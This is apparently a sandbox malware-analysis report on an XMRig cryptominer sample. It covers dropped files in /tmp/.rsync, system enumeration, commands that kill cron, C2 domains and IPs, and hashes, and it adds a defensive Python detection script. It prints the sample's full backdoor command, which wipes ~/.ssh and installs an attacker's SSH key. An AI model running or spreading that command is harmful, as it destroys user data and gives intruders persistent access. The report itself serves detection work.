Analysis Overview
SHA256
7a7bfa4f84e073d45b33ca6d4e5f263d31aa512d124bc6c682029f2b831c7c08
Threat Level: Known bad
The file 1a316d0973bb4f80adeda96a9ff52198_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
Xmrig family
Executes dropped EXE
Loads a kernel module
Enumerates running processes
Checks hardware identifiers (DMI)
Reads hardware information
Checks CPU configuration
Reads CPU attributes
Reads runtime system information
Enumerates kernel/hardware configuration
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-28 12:54
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xmrig family
Analysis: behavioral5
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
ubuntu2204-amd64-20240522.1-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Checks hardware identifiers (DMI)
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/virtual/dmi/id/product_name | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_vendor | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/bios_vendor | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/sys_vendor | /tmp/.rsync/a/anacron | N/A |
Reads hardware information
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/virtual/dmi/id/product_serial | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/product_uuid | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_version | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_asset_tag | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/product_version | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_serial | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_asset_tag | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_vendor | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/bios_date | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_name | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_type | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/bios_version | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_version | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_serial | /tmp/.rsync/a/anacron | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /tmp/.rsync/a/anacron | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/system/cpu/possible | /tmp/.rsync/a/anacron | N/A |
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
| File opened for reading | /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/node/devices/node0/hugepages/hugepages-1048576kB/nr_hugepages | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/package_cpus | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/dax/devices | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index1/level | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/size | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index1/type | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/type | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/node/devices/node0/hugepages | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/physical_package_id | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/size | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/core_id | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/size | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/node/devices/node0/access0/initiators | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/die_cpus | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/type | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/level | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/node/devices/node0/cpumap | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/dax/target_node | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/dax/devices/target_node | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/kernel/mm/hugepages | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/devices/system/node/online | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/node/devices/node0/meminfo | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/core_cpus | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/level | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/type | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/level | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition | /tmp/.rsync/a/anacron | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/mounts | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /proc/meminfo | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /proc/driver/nvidia/gpus | /tmp/.rsync/a/anacron | N/A |
| File opened for reading | /proc/elog | /tmp/.rsync/a/anacron | N/A |
Processes
/tmp/.rsync/a/anacron
[/tmp/.rsync/a/anacron]
/bin/sh
[sh -c cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~]
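The command line above is the sample's persistence step: it wipes `~/.ssh`, recreates it and appends a hard-coded RSA key to `authorized_keys`. As an added triage example (mine, not part of this sandbox report), the Python below turns the indicators from this run into offline checks: it parses `authorized_keys` entries down to the wire format so the installed key can be matched by body and fingerprinted, flags command lines shaped like the one shown, and flags processes running from `/tmp/.rsync/`. The sample `authorized_keys` file, process listing and command line are constructed; the regex patterns and function names are my own assumptions.

```python
"""Added triage example (mine, not part of this sandbox report): turns the
indicators above (appended SSH key, /tmp/.rsync/ staging dir, persistence
command shape) into offline checks.  Sample inputs below are constructed."""
import base64
import hashlib
import re
import struct

# Indicators copied from the report above.
BAD_KEY_BODY = (
    "AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2"
    "a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+"
    "0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+"
    "BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYM"
    "b66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFn"
    "vlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bs"
    "Z0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw==")
BAD_KEY_COMMENT = "mdrfckr"
BAD_PATH_PREFIX = "/tmp/.rsync/"
KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ecdsa-sha2-nistp256")
# Shape of the persistence command in the Processes section (wipe ~/.ssh, then
# append a literal key to authorized_keys); the regexes are my own approximation.
WIPE_SSH_RE = re.compile(r"\brm\s+-\w*r\w*\s+\S*\.ssh\b")
KEY_APPEND_RE = re.compile(r"echo\s+\"?(?:ssh-rsa|ssh-ed25519|ecdsa-sha2-\S+)"
                           r"\s+\S+.*>>\s*\S*authorized_keys")

def _ssh_string(blob, off):
    """Read one SSH wire-format string: uint32 big-endian length, then bytes."""
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n], off + 4 + n

def parse_ssh_pubkey(line):
    """Parse an authorized_keys line (options prefix allowed): type, comment, SHA256 fingerprint, RSA e/bits."""
    parts = line.split()
    idx = next((i for i, p in enumerate(parts) if p in KEY_TYPES), None)
    if idx is None or idx + 1 >= len(parts):
        raise ValueError("no key material on line")
    ktype, body, comment = parts[idx], parts[idx + 1], " ".join(parts[idx + 2:])
    blob = base64.b64decode(body, validate=True)   # binascii.Error is a ValueError
    wire_type, off = _ssh_string(blob, 0)
    if wire_type != ktype.encode():
        raise ValueError("key type in text and wire format disagree")
    digest = base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")
    info = {"type": ktype, "body": body, "comment": comment,
            "fingerprint": "SHA256:" + digest}
    if ktype == "ssh-rsa":
        e, off = _ssh_string(blob, off)
        n, off = _ssh_string(blob, off)
        info["e"] = int.from_bytes(e, "big")
        info["n_bits"] = int.from_bytes(n, "big").bit_length()
    return info

def scan_authorized_keys(text):
    """Return (lineno, reason) for entries that match the report's key or do not parse."""
    hits = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            info = parse_ssh_pubkey(line)
        except (ValueError, struct.error):
            hits.append((lineno, "unparseable authorized_keys entry"))
            continue
        if info["body"] == BAD_KEY_BODY:
            hits.append((lineno, "known-bad key " + info["fingerprint"]))
        elif info["comment"] == BAD_KEY_COMMENT:
            hits.append((lineno, "comment matches known-bad key"))
    return hits

def classify_cmdline(cmd):
    """List the reasons a shell command line matches the behaviour in the report."""
    reasons = []
    if WIPE_SSH_RE.search(cmd) and "authorized_keys" in cmd:
        reasons.append("wipes ~/.ssh and rewrites authorized_keys")
    if KEY_APPEND_RE.search(cmd):
        reasons.append("appends a literal public key to authorized_keys")
    if BAD_PATH_PREFIX in cmd:
        reasons.append("references " + BAD_PATH_PREFIX)
    if BAD_KEY_COMMENT in cmd:
        reasons.append("contains key comment " + BAD_KEY_COMMENT)
    return reasons

def scan_processes(ps_lines):
    """Flag 'ps -eo pid,user,args' lines whose command runs from /tmp/.rsync/."""
    return [line for line in ps_lines if BAD_PATH_PREFIX in line]

# Constructed samples: a benign ed25519 entry (all-zero point, parse-only), the
# key the sample installs, and ps-style lines including the report's command.
def _fake_ed25519_line(comment):
    blob = b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + bytes(32)
    return "ssh-ed25519 " + base64.b64encode(blob).decode() + " " + comment

SAMPLE_AUTHORIZED_KEYS = ("# constructed sample\n" + _fake_ed25519_line("ops@bastion")
                          + "\nssh-rsa " + BAD_KEY_BODY + " " + BAD_KEY_COMMENT + "\n")
SAMPLE_CMDLINE = ('cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa ' + BAD_KEY_BODY
                  + ' mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~')
SAMPLE_PS = ["  812 root     /usr/sbin/cron -f", " 2231 www-data /tmp/.rsync/a/anacron",
             " 2240 www-data sh -c " + SAMPLE_CMDLINE]

if __name__ == "__main__":
    print("authorized_keys:", scan_authorized_keys(SAMPLE_AUTHORIZED_KEYS))
    print("processes:", [(p.strip(), classify_cmdline(p)) for p in SAMPLE_PS])
```

On a real host, feed `scan_authorized_keys` the `authorized_keys` of every account (including root and service users), `scan_processes` the output of `ps -eo pid,user,args`, and `classify_cmdline` shell history or audit command lines. The key-body match is exact; the comment match is a weaker secondary signal, since the comment is free text the operator can change. Parsing down to the wire format also exposes that this key uses the public exponent 37 and a 2048-bit modulus, which is useful when the same key shows up with a different comment.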
Network
| Country | Destination | Domain | Proto | Observed |
| N/A | 224.0.0.251:5353 | N/A | udp | once (mDNS) |
| US | 8.8.8.8:53 | debian-package.center | udp | repeated throughout the run |
| US | 1.1.1.1:53 | debian-package.center | udp | repeated throughout the run |
| NL | 45.9.148.125:80 | N/A | tcp | repeated throughout the run |
| NL | 45.9.148.129:80 | N/A | tcp | several times |
The lookups for debian-package.center are retried in alternating bursts to 8.8.8.8 and 1.1.1.1 for the whole 150 s capture, interleaved with repeated TCP connections to 45.9.148.125:80 and, less often, 45.9.148.129:80. The report does not show a DNS answer, so it does not establish whether the two 45.9.148.x hosts are what the domain resolves to.
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
ubuntu2204-amd64-20240611-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
Processes
/tmp/.rsync/c/lib/32/libnss_dns.so.2
[/tmp/.rsync/c/lib/32/libnss_dns.so.2]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | N/A | udp |
Files
Analysis: behavioral27
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:54
Platform
ubuntu2404-amd64-20240523-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral32
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:58
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
Processes
/tmp/.rsync/c/lib/64/libdl.so.2
[/tmp/.rsync/c/lib/64/libdl.so.2]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | N/A | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-mipsel-20240418-en
Max time kernel
14s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/.rsync/a/upd | /tmp/.rsync/a/upd | N/A |
Enumerates running processes
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /sbin/sysctl | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/node | /tmp/.rsync/a/a | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/18/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/sys/kernel/pid_max | /bin/ps | N/A |
| File opened for reading | /proc/9/status | /bin/ps | N/A |
| File opened for reading | /proc/22/stat | /bin/ps | N/A |
| File opened for reading | /proc/734/stat | /bin/ps | N/A |
| File opened for reading | /proc/735/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/145/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/352/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/149/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/151/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/16/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/684/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/733/stat | /bin/ps | N/A |
| File opened for reading | /proc/23/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/37/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/660/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/19/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/320/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/352/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/22/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/657/status | /bin/ps | N/A |
| File opened for reading | /proc/22/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/653/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/145/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/691/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/82/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/352/status | /bin/ps | N/A |
| File opened for reading | /proc/741/stat | /bin/ps | N/A |
| File opened for reading | /proc/37/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/657/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/14/status | /bin/ps | N/A |
| File opened for reading | /proc/72/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/685/stat | /bin/ps | N/A |
| File opened for reading | /proc/2/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/12/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/78/status | /bin/ps | N/A |
| File opened for reading | /proc/719/status | /bin/ps | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /usr/bin/pkill | N/A |
| File opened for reading | /proc/685/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/685/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/20/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/76/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/707/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/117/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/374/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/659/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/6/status | /bin/ps | N/A |
| File opened for reading | /proc/11/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/filesystems | /sbin/sysctl | N/A |
| File opened for reading | /proc/20/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/15/status | /bin/ps | N/A |
| File opened for reading | /proc/117/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/5/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/17/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/374/status | /bin/ps | N/A |
| File opened for reading | /proc/710/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/145/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/691/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/377/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/8/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/71/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/21/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/72/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/71/cmdline | /usr/bin/pkill | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/a/bash.pid | /tmp/.rsync/a/run | N/A |
| File opened for modification | /tmp/.rsync/a/dir.dir | /tmp/.rsync/a/a | N/A |
| File opened for modification | /tmp/.rsync/a/upd | /tmp/.rsync/a/a | N/A |
| File opened for modification | /tmp/.rsync/a/.proc | /tmp/.rsync/a/stop | N/A |
| File opened for modification | /tmp/.rsync/a/dir.dir | /tmp/.rsync/a/run | N/A |
Processes
/tmp/.rsync/a/a
[/tmp/.rsync/a/a]
/usr/bin/crontab
[crontab -r]
/bin/cat
[cat dir.dir]
/usr/bin/nproc
[nproc]
/sbin/sysctl
[sysctl -w vm.nr_hugepages=1]
/usr/bin/find
[find /sys/devices/system/node/node* -maxdepth 0 -type d]
/sbin/modprobe
[modprobe msr]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep AMD Ryzen]
/bin/grep
[grep Intel]
/bin/cat
[cat /proc/cpuinfo]
/bin/chmod
[chmod u+x upd]
/bin/chmod
[chmod 777 a anacron cron dir.dir run stop upd]
/tmp/.rsync/a/upd
[./upd]
/tmp/.rsync/a/run
[./run]
/tmp/.rsync/a/stop
[./stop]
/usr/bin/pkill
[pkill -9 cron]
/usr/bin/killall
[killall -9 cron]
/bin/ps
[ps x]
/bin/grep
[grep -v grep]
/bin/grep
[grep cron]
/usr/bin/awk
[awk {print $1}]
/bin/rm
[rm -rf .proc]
/bin/sleep
[sleep 10]
/bin/cat
[cat dir.dir]
/bin/uname
[uname -m]
Network
Files
/tmp/.rsync/a/dir.dir
| MD5 | b3d878adcf4672bbd1f31cffac10c769 |
| SHA1 | ce5798837933ece35a7e26a0a3dc06cab19c6275 |
| SHA256 | ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7 |
| SHA512 | 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c |
/tmp/.rsync/a/upd
| MD5 | a136fbe534c2487d3c89bd6a26847bd0 |
| SHA1 | 11b9362ba79b67dd5d5baf7cf11e0003f049d6e0 |
| SHA256 | 419a443ff93475ef3abb6e71e5a94e56aea8b7c1f1c4402b3662425815432d46 |
| SHA512 | 85047cf9d22037d2581ae41275107b243c0bb3259b57fe46bd3fd04a1abe75a7fdeace8a9eae1fae31349a00183206b40259ab3957db8f4f16a79e67133485e9 |
/tmp/.rsync/a/bash.pid
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
Analysis: behavioral14
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-mipsel-20240226-en
Max time kernel
4s
Command Line
Signatures
Enumerates running processes
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/387/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/103/stat | /bin/ps | N/A |
| File opened for reading | /proc/351/stat | /bin/ps | N/A |
| File opened for reading | /proc/730/status | /bin/ps | N/A |
| File opened for reading | /proc/78/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/24/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/78/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/724/stat | /bin/ps | N/A |
| File opened for reading | /proc/71/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/351/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/324/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/37/stat | /bin/ps | N/A |
| File opened for reading | /proc/320/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/23/status | /bin/ps | N/A |
| File opened for reading | /proc/144/stat | /bin/ps | N/A |
| File opened for reading | /proc/225/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/726/stat | /bin/ps | N/A |
| File opened for reading | /proc/77/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/320/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/70/stat | /bin/ps | N/A |
| File opened for reading | /proc/76/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/21/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/36/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/477/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/320/status | /bin/ps | N/A |
| File opened for reading | /proc/3/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/698/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/514/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/sys/kernel/pid_max | /bin/ps | N/A |
| File opened for reading | /proc/17/status | /bin/ps | N/A |
| File opened for reading | /proc/16/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/699/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/727/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/8/stat | /bin/ps | N/A |
| File opened for reading | /proc/12/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/7/status | /bin/ps | N/A |
| File opened for reading | /proc/324/status | /bin/ps | N/A |
| File opened for reading | /proc/684/stat | /bin/ps | N/A |
| File opened for reading | /proc/24/status | /bin/ps | N/A |
| File opened for reading | /proc/82/stat | /bin/ps | N/A |
| File opened for reading | /proc/144/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/514/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/79/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/725/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1/stat | /bin/ps | N/A |
| File opened for reading | /proc/738/status | /bin/ps | N/A |
| File opened for reading | /proc/69/stat | /bin/ps | N/A |
| File opened for reading | /proc/514/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/699/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/8/status | /bin/ps | N/A |
| File opened for reading | /proc/13/status | /bin/ps | N/A |
| File opened for reading | /proc/37/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/3/stat | /bin/ps | N/A |
| File opened for reading | /proc/730/stat | /bin/ps | N/A |
| File opened for reading | /proc/470/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/698/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/4/status | /bin/ps | N/A |
| File opened for reading | /proc/722/stat | /bin/ps | N/A |
